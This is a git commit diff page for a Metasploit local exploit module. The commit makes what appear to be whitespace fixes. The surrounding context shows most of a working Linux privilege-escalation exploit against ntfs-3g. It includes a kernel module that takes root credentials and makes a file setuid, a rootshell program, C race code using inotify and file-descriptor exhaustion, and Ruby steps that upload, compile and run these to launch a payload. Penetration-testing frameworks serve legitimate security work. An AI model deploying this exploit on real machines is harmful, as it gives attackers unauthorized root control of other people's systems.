forgot add fixes for travis
h00die
parent
a8609f5c66
commit
0c353841ab
|
|
@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
# check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
|
||||
def headers_installed?()
|
||||
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
|
||||
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
|
||||
if output
|
||||
if output.include?('linux-headers')
|
||||
return true
|
||||
|
|
@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
CheckCode::Appears
|
||||
else
|
||||
print_error("Version installed not vulnerable: #{output}")
|
||||
CheckCode::Safe
|
||||
CheckCode::Safe
|
||||
end
|
||||
else
|
||||
print_error('ntfs-3g not installed')
|
||||
|
|
@ -132,18 +132,18 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
#include <linux/cred.h>
|
||||
#include <linux/syscalls.h>
|
||||
#include <linux/kallsyms.h>
|
||||
|
||||
|
||||
static int suidfile_fd = -1;
|
||||
module_param(suidfile_fd, int, 0);
|
||||
|
||||
|
||||
static int __init init_rootmod(void) {
|
||||
int (*sys_fchown_)(int fd, int uid, int gid);
|
||||
int (*sys_fchmod_)(int fd, int mode);
|
||||
const struct cred *kcred, *oldcred;
|
||||
|
||||
|
||||
sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");
|
||||
sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");
|
||||
|
||||
|
||||
printk(KERN_INFO "rootmod loading\n");
|
||||
kcred = prepare_kernel_cred(NULL);
|
||||
oldcred = override_creds(kcred);
|
||||
|
|
@ -152,12 +152,12 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
revert_creds(oldcred);
|
||||
return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */
|
||||
}
|
||||
|
||||
|
||||
static void __exit cleanup_rootmod(void) {}
|
||||
|
||||
|
||||
module_init(init_rootmod);
|
||||
module_exit(cleanup_rootmod);
|
||||
|
||||
|
||||
MODULE_LICENSE("GPL v2");
|
||||
}
|
||||
|
||||
|
|
@ -166,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
#include <err.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
|
||||
int main(void) {
|
||||
if (setuid(0) || setgid(0))
|
||||
err(1, "setuid/setgid");
|
||||
|
|
@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
#include <sys/wait.h>
|
||||
#include <time.h>
|
||||
#include <sys/utsname.h>
|
||||
|
||||
|
||||
int main(void) {
|
||||
/* prevent shell from backgrounding ntfs-3g when stopped */
|
||||
pid_t initial_fork_child = fork();
|
||||
|
|
@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
execl("rootshell", "rootshell", NULL);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
char buf[1000] = {0};
|
||||
// Set up workspace with volume, mountpoint, modprobe config and module directory.
|
||||
char template[] = "/tmp/ntfs_sploit.XXXXXX";
|
||||
|
|
@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
template, template);
|
||||
if (system(system_cmd))
|
||||
errx(1, "shell command failed");
|
||||
|
||||
|
||||
// Set up inotify watch for /proc/mounts.
|
||||
// Note: /proc/mounts is a symlink to /proc/self/mounts, so
|
||||
// the watch will only see accesses by this process.
|
||||
|
|
@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
err(1, "unable to create inotify fd?");
|
||||
if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
|
||||
err(1, "unable to watch /proc/mounts");
|
||||
|
||||
|
||||
// Set up inotify watch for /proc/filesystems.
|
||||
// This can be used to detect whether we lost the race.
|
||||
int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
|
||||
|
|
@ -256,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
err(1, "unable to create inotify fd?");
|
||||
if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
|
||||
err(1, "unable to watch /proc/filesystems");
|
||||
|
||||
|
||||
// Set up inotify watch for /sbin/modprobe.
|
||||
// This can be used to detect when we can release all our open files.
|
||||
int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
|
||||
|
|
@ -264,7 +264,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
err(1, "unable to create inotify fd?");
|
||||
if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
|
||||
err(1, "unable to watch /sbin/modprobe");
|
||||
|
||||
|
||||
int do_exec_pipe[2];
|
||||
if (pipe2(do_exec_pipe, O_CLOEXEC))
|
||||
err(1, "pipe");
|
||||
|
|
@ -280,16 +280,16 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
|
||||
}
|
||||
child = getpid();
|
||||
|
||||
|
||||
// Now launch ntfs-3g and wait until it opens /proc/mounts
|
||||
if (write(do_exec_pipe[1], buf, 1) != 1)
|
||||
errx(1, "pipe write failed");
|
||||
|
||||
|
||||
if (read(inotify_fd, buf, sizeof(buf)) <= 0)
|
||||
errx(1, "inotify read failed");
|
||||
if (kill(getppid(), SIGSTOP))
|
||||
err(1, "can't stop setuid parent");
|
||||
|
||||
|
||||
// Check whether we won the main race.
|
||||
struct pollfd poll_fds[1] = {{
|
||||
.fd = fs_inotify_fd,
|
||||
|
|
@ -308,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
exit(1);
|
||||
}
|
||||
puts("looks like we won the race");
|
||||
|
||||
|
||||
// Open as many files as possible. Whenever we have
|
||||
// a bunch of open files, move them into a new process.
|
||||
int total_open_files = 0;
|
||||
|
|
@ -342,13 +342,13 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
if (reached_limit)
|
||||
break;
|
||||
}
|
||||
|
||||
|
||||
// Wake up ntfs-3g and keep allocating files, then free up
|
||||
// the files as soon as we're reasonably certain that either
|
||||
// modprobe was spawned or the attack failed.
|
||||
if (kill(getppid(), SIGCONT))
|
||||
err(1, "SIGCONT");
|
||||
|
||||
|
||||
time_t start_time = time(NULL);
|
||||
while (1) {
|
||||
for (int i=0; i<1000; i++) {
|
||||
|
|
@ -425,7 +425,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
|
||||
print_status('Writing files to target')
|
||||
cmd_exec("cd #{datastore['WritableDir']}")
|
||||
|
||||
|
||||
#write all the files and compile. This is equivalent to the original compile.sh
|
||||
#gcc -o rootshell rootshell.c -Wall
|
||||
upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")
|
||||
|
|
@ -443,7 +443,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
cmd_exec('/sbin/depmod -b depmod_tmp/')
|
||||
cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')
|
||||
cmd_exec('rm -rf depmod_tmp')
|
||||
|
||||
|
||||
register_file_for_cleanup("#{rootmod_path}.ko")
|
||||
register_file_for_cleanup("#{rootmod_path}.mod.c")
|
||||
register_file_for_cleanup("#{rootmod_path}.mod.o")
|
||||
|
|
@ -454,7 +454,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
output = cmd_exec(sploit_path)
|
||||
unless session_created?
|
||||
# this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,
|
||||
# but binary payload was caught, or NIPS shut down the callback etc.
|
||||
# but binary payload was caught, or NIPS shut down the callback etc.
|
||||
vprint_error(output)
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue